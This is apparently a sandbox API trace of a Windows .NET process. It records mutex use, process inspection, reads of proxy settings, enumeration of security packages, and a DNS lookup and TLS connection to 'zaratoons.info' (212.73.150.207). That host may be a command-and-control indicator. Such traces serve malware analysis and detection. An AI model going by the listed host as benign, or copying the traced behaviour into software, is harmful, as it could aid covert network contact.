	[0901.626] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8 | out: lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8) returned 1
	[0901.626] CloseHandle (hObject=0x424) returned 1
	[0901.626] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x424
	[0901.626] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.627] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.627] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c75d828, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c75d828*=0x428) returned 1
	[0901.627] CloseHandle (hObject=0x428) returned 1
	[0901.627] CloseHandle (hObject=0x424) returned 1
	[0901.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x424
	[0901.627] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8 | out: lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8) returned 1
	[0901.627] CloseHandle (hObject=0x424) returned 1
	[0901.627] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x424
	[0901.628] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.628] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.628] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c75d828, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c75d828*=0x428) returned 1
	[0901.628] CloseHandle (hObject=0x428) returned 1
	[0901.628] CloseHandle (hObject=0x424) returned 1
	[0901.630] ReleaseMutex (hMutex=0x418) returned 1
	[0901.698] CloseHandle (hObject=0x418) returned 1
	[0901.698] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2df6108, cbSid=0x1c75d930 | out: pSid=0x2df6108*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d930) returned 1
	[0901.698] CreateMutexW (lpMutexAttributes=0x2df62c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.698] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0901.771] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x1f4) returned 0x0
	[0902.000] ReleaseMutex (hMutex=0x418) returned 1
	[0902.000] CloseHandle (hObject=0x418) returned 1
	[0902.000] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2df6f50, cbSid=0x1c75d930 | out: pSid=0x2df6f50*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d930) returned 1
	[0902.001] CreateMutexW (lpMutexAttributes=0x2df7108, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.001] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0902.001] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x1f4) returned 0x0
	[0902.086] ReleaseMutex (hMutex=0x418) returned 1
	[0902.086] CloseHandle (hObject=0x418) returned 1
	[0902.086] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2df7da8, cbSid=0x1c75d930 | out: pSid=0x2df7da8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d930) returned 1
	[0902.086] CreateMutexW (lpMutexAttributes=0x2df7f60, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.087] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0902.087] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x1f4) returned 0x0
	[0902.110] ReleaseMutex (hMutex=0x418) returned 1
	[0902.110] CloseHandle (hObject=0x418) returned 1
	[0902.110] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2df8bf8, cbSid=0x1c75d930 | out: pSid=0x2df8bf8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d930) returned 1
	[0902.110] CreateMutexW (lpMutexAttributes=0x2df8db0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.110] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0902.110] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x1f4) returned 0x0
	[0902.124] ReleaseMutex (hMutex=0x418) returned 1
	[0902.124] CloseHandle (hObject=0x418) returned 1
	[0902.126] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2df9a48, cbSid=0x1c75d8e0 | out: pSid=0x2df9a48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d8e0) returned 1
	[0902.126] CreateMutexW (lpMutexAttributes=0x2df9c00, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.126] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0902.138] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2dfa888, cbSid=0x1c75d8e0 | out: pSid=0x2dfa888*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d8e0) returned 1
	[0902.138] CreateMutexW (lpMutexAttributes=0x2dfaa40, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.139] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0902.140] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2dfb6c0, cbSid=0x1c75d8e0 | out: pSid=0x2dfb6c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d8e0) returned 1
	[0902.140] CreateMutexW (lpMutexAttributes=0x2dfb878, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.141] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0902.142] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2dfc508, cbSid=0x1c75d8e0 | out: pSid=0x2dfc508*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d8e0) returned 1
	[0902.142] CreateMutexW (lpMutexAttributes=0x2dfc6c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.142] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0902.143] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2dfd348, cbSid=0x1c75d8e0 | out: pSid=0x2dfd348*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d8e0) returned 1
	[0902.143] CreateMutexW (lpMutexAttributes=0x2dfd500, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.144] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0902.167] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424
	[0902.168] ioctlsocket (in: s=0x418, cmd=-2147195266, argp=0x1c75df18 | out: argp=0x1c75df18) returned 0
	[0902.168] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x428
	[0902.168] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x42c
	[0902.168] ioctlsocket (in: s=0x428, cmd=-2147195266, argp=0x1c75df18 | out: argp=0x1c75df18) returned 0
	[0902.169] WSAIoctl (in: s=0x418, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c75de90, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c75de90, lpOverlapped=0x0) returned -1
	[0902.170] CoTaskMemAlloc (cb=0x204) returned 0x2e24f0
	[0902.170] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2e24f0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.170] CoTaskMemFree (pv=0x2e24f0) 
	[0902.171] WSAEventSelect (s=0x418, hEventObject=0x424, lNetworkEvents=512) returned 0
	[0902.171] WSAIoctl (in: s=0x428, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c75de90, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c75de90, lpOverlapped=0x0) returned -1
	[0902.171] CoTaskMemAlloc (cb=0x204) returned 0x2e24f0
	[0902.171] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2e24f0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.171] CoTaskMemFree (pv=0x2e24f0) 
	[0902.171] WSAEventSelect (s=0x428, hEventObject=0x42c, lNetworkEvents=512) returned 0
	[0902.171] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x430
	[0902.172] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x430, param_3=0x3) returned 0x0
	[0902.216] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c75dfd0 | out: phkResult=0x1c75dfd0*=0x448) returned 0x0
	[0902.218] RegOpenKeyExW (in: hKey=0x448, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c75deb8 | out: phkResult=0x1c75deb8*=0x44c) returned 0x0
	[0902.218] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450
	[0902.218] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0
	[0902.219] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c75dee0 | out: phkResult=0x1c75dee0*=0x454) returned 0x0
	[0902.219] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x458
	[0902.219] RegNotifyChangeKeyValue (hKey=0x454, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x458, fAsynchronous=1) returned 0x0
	[0902.219] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c75dee0 | out: phkResult=0x1c75dee0*=0x45c) returned 0x0
	[0902.219] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x460
	[0902.219] RegNotifyChangeKeyValue (hKey=0x45c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x460, fAsynchronous=1) returned 0x0
	[0902.220] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.220] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75de48 | out: TokenHandle=0x1c75de48*=0x464) returned 1
	[0902.225] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.226] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d618 | out: TokenHandle=0x1c75d618*=0x468) returned 1
	[0902.230] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.230] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d618 | out: TokenHandle=0x1c75d618*=0x46c) returned 1
	[0902.239] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c75df18 | out: pProxyConfig=0x1c75df18) returned 1
	[0904.406] SetEvent (hEvent=0x388) returned 1
	[0905.079] GetCurrentProcess () returned 0xffffffffffffffff
	[0905.079] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d688 | out: TokenHandle=0x1c75d688*=0x4bc) returned 1
	[0905.082] GetCurrentProcess () returned 0xffffffffffffffff
	[0905.082] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d688 | out: TokenHandle=0x1c75d688*=0x4c0) returned 1
	[0905.083] SetEvent (hEvent=0x388) returned 1
	[0905.520] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c75db58 | out: pFixedInfo=0x0, pOutBufLen=0x1c75db58) returned 0x6f
	[0905.761] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b79a660
	[0905.761] GetNetworkParams (in: pFixedInfo=0x1b79a660, pOutBufLen=0x1c75db58 | out: pFixedInfo=0x1b79a660, pOutBufLen=0x1c75db58) returned 0x0
	[0905.870] CoTaskMemAlloc (cb=0xd) returned 0x1b77ce40
	[0905.870] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0905.870] CoTaskMemFree (pv=0x1b77ce40) 
	[0905.873] LocalFree (hMem=0x1b79a660) returned 0x0
	[0905.886] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d4
	[0905.887] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d0
	[0905.889] CoTaskMemAlloc (cb=0x10) returned 0x1b77ce40
	[0905.890] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c75db00*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c75daf8 | out: ppResult=0x1c75daf8*=0x1b79c560*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b77cea0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0907.444] CoTaskMemFree (pv=0x1b77ce40) 
	[0907.444] CoTaskMemFree (pv=0x0) 
	[0907.445] FreeAddrInfoW (pAddrInfo=0x1b79c560*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b77cea0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0907.446] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
	[0907.446] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4dc
	[0907.446] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x1c75db18 | out: argp=0x1c75db18) returned 0
	[0907.446] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4ec
	[0907.446] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4f0
	[0907.446] ioctlsocket (in: s=0x4ec, cmd=-2147195266, argp=0x1c75db18 | out: argp=0x1c75db18) returned 0
	[0907.446] WSAIoctl (in: s=0x4e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c75da90, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c75da90, lpOverlapped=0x0) returned -1
	[0907.446] CoTaskMemAlloc (cb=0x204) returned 0x2e24f0
	[0907.446] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2e24f0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.446] CoTaskMemFree (pv=0x2e24f0) 
	[0907.446] WSAEventSelect (s=0x4e4, hEventObject=0x4dc, lNetworkEvents=512) returned 0
	[0907.447] WSAIoctl (in: s=0x4ec, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c75da90, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c75da90, lpOverlapped=0x0) returned -1
	[0907.447] CoTaskMemAlloc (cb=0x204) returned 0x2e24f0
	[0907.447] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2e24f0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.447] CoTaskMemFree (pv=0x2e24f0) 
	[0907.447] WSAEventSelect (s=0x4ec, hEventObject=0x4f0, lNetworkEvents=512) returned 0
	[0907.448] GetAdaptersAddresses () returned 0x6f
	[0907.603] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b7a6e00
	[0907.603] GetAdaptersAddresses () returned 0x0
	[0907.652] LocalFree (hMem=0x1b7a6e00) returned 0x0
	[0907.654] WSAConnect (in: s=0x4d4, name=0x2e08e90*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0907.815] closesocket (s=0x4d0) returned 0
	[0907.861] EnumerateSecurityPackagesW (in: pcPackages=0x1c75d978, ppPackageInfo=0x1c75d970 | out: pcPackages=0x1c75d978, ppPackageInfo=0x1c75d970) returned 0x0
	[0907.992] lstrlenW (lpString="Negotiate") returned 9
	[0907.993] CoTaskMemAlloc (cb=0x16) returned 0x1b77ce80
	[0907.993] RtlMoveMemory (in: Destination=0x1b77ce80, Source=0x2c4ea0, Length=0x14 | out: Destination=0x1b77ce80) 
	[0907.993] CoTaskMemFree (pv=0x1b77ce80) 
	[0907.993] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0907.993] CoTaskMemAlloc (cb=0x3c) returned 0x1b77c3a0
	[0907.993] RtlMoveMemory (in: Destination=0x1b77c3a0, Source=0x2c4eb4, Length=0x3a | out: Destination=0x1b77c3a0) 
	[0907.993] CoTaskMemFree (pv=0x1b77c3a0) 
	[0907.993] lstrlenW (lpString="NegoExtender") returned 12
	[0907.993] CoTaskMemAlloc (cb=0x1c) returned 0x1b795650
	[0907.993] RtlMoveMemory (in: Destination=0x1b795650, Source=0x2c4eee, Length=0x1a | out: Destination=0x1b795650) 
	[0907.993] CoTaskMemFree (pv=0x1b795650) 
	[0907.993] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0907.993] CoTaskMemAlloc (cb=0x3e) returned 0x1b77c3a0
	[0907.993] RtlMoveMemory (in: Destination=0x1b77c3a0, Source=0x2c4f08, Length=0x3c | out: Destination=0x1b77c3a0) 
	[0907.993] CoTaskMemFree (pv=0x1b77c3a0) 
	[0907.993] lstrlenW (lpString="Kerberos") returned 8
	[0907.993] CoTaskMemAlloc (cb=0x14) returned 0x1b77ce80
	[0907.993] RtlMoveMemory (in: Destination=0x1b77ce80, Source=0x2c4f44, Length=0x12 | out: Destination=0x1b77ce80) 
	[0907.993] CoTaskMemFree (pv=0x1b77ce80) 
	[0907.994] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0907.994] CoTaskMemAlloc (cb=0x32) returned 0x1b79c5e0
	[0907.994] RtlMoveMemory (in: Destination=0x1b79c5e0, Source=0x2c4f56, Length=0x30 | out: Destination=0x1b79c5e0) 
	[0907.994] CoTaskMemFree (pv=0x1b79c5e0) 
	[0907.994] lstrlenW (lpString="NTLM") returned 4
	[0907.994] CoTaskMemAlloc (cb=0xc) returned 0x1b77ce80
	[0907.994] RtlMoveMemory (in: Destination=0x1b77ce80, Source=0x2c4f86, Length=0xa | out: Destination=0x1b77ce80) 
	[0907.994] CoTaskMemFree (pv=0x1b77ce80) 
	[0907.994] lstrlenW (lpString="NTLM Security Package") returned 21
	[0907.994] CoTaskMemAlloc (cb=0x2e) returned 0x1b79c5e0
	[0907.994] RtlMoveMemory (in: Destination=0x1b79c5e0, Source=0x2c4f90, Length=0x2c | out: Destination=0x1b79c5e0) 
	[0907.994] CoTaskMemFree (pv=0x1b79c5e0) 
	[0907.994] lstrlenW (lpString="Schannel") returned 8
	[0907.994] CoTaskMemAlloc (cb=0x14) returned 0x1b77ce80
	[0907.994] RtlMoveMemory (in: Destination=0x1b77ce80, Source=0x2c4fbc, Length=0x12 | out: Destination=0x1b77ce80) 
	[0907.994] CoTaskMemFree (pv=0x1b77ce80) 
	[0907.994] lstrlenW (lpString="Schannel Security Package") returned 25
	[0907.994] CoTaskMemAlloc (cb=0x36) returned 0x1b79c5e0
	[0907.994] RtlMoveMemory (in: Destination=0x1b79c5e0, Source=0x2c4fce, Length=0x34 | out: Destination=0x1b79c5e0) 
	[0907.994] CoTaskMemFree (pv=0x1b79c5e0) 
	[0907.994] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0907.994] CoTaskMemAlloc (cb=0x5c) returned 0x1b76af60
	[0907.994] RtlMoveMemory (in: Destination=0x1b76af60, Source=0x2c5002, Length=0x5a | out: Destination=0x1b76af60) 
	[0907.994] CoTaskMemFree (pv=0x1b76af60) 
	[0907.994] lstrlenW (lpString="Schannel Security Package") returned 25
	[0907.994] CoTaskMemAlloc (cb=0x36) returned 0x1b79c5e0
	[0907.994] RtlMoveMemory (in: Destination=0x1b79c5e0, Source=0x2c505c, Length=0x34 | out: Destination=0x1b79c5e0) 
	[0907.994] CoTaskMemFree (pv=0x1b79c5e0) 
	[0907.994] lstrlenW (lpString="WDigest") returned 7
	[0907.995] CoTaskMemAlloc (cb=0x12) returned 0x1b77ce80
	[0907.995] RtlMoveMemory (in: Destination=0x1b77ce80, Source=0x2c5090, Length=0x10 | out: Destination=0x1b77ce80) 
	[0907.995] CoTaskMemFree (pv=0x1b77ce80) 
	[0907.995] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0907.995] CoTaskMemAlloc (cb=0x46) returned 0x1b77c3a0
	[0907.995] RtlMoveMemory (in: Destination=0x1b77c3a0, Source=0x2c50a0, Length=0x44 | out: Destination=0x1b77c3a0) 
	[0907.995] CoTaskMemFree (pv=0x1b77c3a0) 
	[0907.995] lstrlenW (lpString="TSSSP") returned 5
	[0907.995] CoTaskMemAlloc (cb=0xe) returned 0x1b77ce80
	[0907.995] RtlMoveMemory (in: Destination=0x1b77ce80, Source=0x2c50e4, Length=0xc | out: Destination=0x1b77ce80) 
	[0907.995] CoTaskMemFree (pv=0x1b77ce80) 
	[0907.995] lstrlenW (lpString="TS Service Security Package") returned 27
	[0907.995] CoTaskMemAlloc (cb=0x3a) returned 0x1b77c3a0
	[0907.995] RtlMoveMemory (in: Destination=0x1b77c3a0, Source=0x2c50f0, Length=0x38 | out: Destination=0x1b77c3a0) 
	[0907.995] CoTaskMemFree (pv=0x1b77c3a0) 
	[0907.995] lstrlenW (lpString="pku2u") returned 5
	[0907.995] CoTaskMemAlloc (cb=0xe) returned 0x1b77ce80
	[0907.995] RtlMoveMemory (in: Destination=0x1b77ce80, Source=0x2c5128, Length=0xc | out: Destination=0x1b77ce80) 
	[0907.995] CoTaskMemFree (pv=0x1b77ce80) 
	[0907.995] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0907.995] CoTaskMemAlloc (cb=0x30) returned 0x1b79c5e0
	[0907.995] RtlMoveMemory (in: Destination=0x1b79c5e0, Source=0x2c5134, Length=0x2e | out: Destination=0x1b79c5e0) 
	[0907.995] CoTaskMemFree (pv=0x1b79c5e0) 
	[0907.995] lstrlenW (lpString="CREDSSP") returned 7
	[0907.995] CoTaskMemAlloc (cb=0x12) returned 0x1b77ce80
	[0907.995] RtlMoveMemory (in: Destination=0x1b77ce80, Source=0x2c5162, Length=0x10 | out: Destination=0x1b77ce80) 
	[0907.995] CoTaskMemFree (pv=0x1b77ce80) 
	[0907.995] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0907.995] CoTaskMemAlloc (cb=0x4a) returned 0x1b7a2e90
	[0907.995] RtlMoveMemory (in: Destination=0x1b7a2e90, Source=0x2c5172, Length=0x48 | out: Destination=0x1b7a2e90) 
	[0907.996] CoTaskMemFree (pv=0x1b7a2e90) 
	[0907.996] FreeContextBuffer (in: pvContextBuffer=0x2c4d60 | out: pvContextBuffer=0x2c4d60) returned 0x0
	[0908.003] GetCurrentProcess () returned 0xffffffffffffffff
	[0908.003] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d458 | out: TokenHandle=0x1c75d458*=0x4d0) returned 1
	[0908.006] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2e0d048, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c75d368, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c75d358, ptsExpiry=0x1c75d350 | out: phCredential=0x1c75d358, ptsExpiry=0x1c75d350) returned 0x0
	[0908.052] InitializeSecurityContextW (in: phCredential=0x1c75d560, phContext=0x0, pTargetName=0x2e01ab0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c75d550, pOutput=0x2e0f790, pfContextAttr=0x1c75d548, ptsExpiry=0x1c75d540 | out: phNewContext=0x1c75d550, pOutput=0x2e0f790, pfContextAttr=0x1c75d548, ptsExpiry=0x1c75d540) returned 0x90312
	[0908.999] FreeContextBuffer (in: pvContextBuffer=0x1b77d560 | out: pvContextBuffer=0x1b77d560) returned 0x0
	[0909.006] send (s=0x4d4, buf=0x2e0f860*, len=118, flags=0) returned 118
	[0909.007] recv (in: s=0x4d4, buf=0x2e0f860, len=5, flags=0 | out: buf=0x2e0f860*) returned 5
	[0909.168] recv (in: s=0x4d4, buf=0x2e0f865, len=93, flags=0 | out: buf=0x2e0f865*) returned 93
	[0909.169] InitializeSecurityContextW (in: phCredential=0x1c75d480, phContext=0x1c75d730, pTargetName=0x2e01ab0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e0fb70, Reserved2=0x0, phNewContext=0x1c75d470, pOutput=0x2e0fb90, pfContextAttr=0x1c75d468, ptsExpiry=0x1c75d460 | out: phNewContext=0x1c75d470, pOutput=0x2e0fb90, pfContextAttr=0x1c75d468, ptsExpiry=0x1c75d460) returned 0x90312
	[0909.177] recv (in: s=0x4d4, buf=0x2e0fc80, len=5, flags=0 | out: buf=0x2e0fc80*) returned 5
	[0909.177] recv (in: s=0x4d4, buf=0x2e0fca5, len=2556, flags=0 | out: buf=0x2e0fca5*) returned 2556
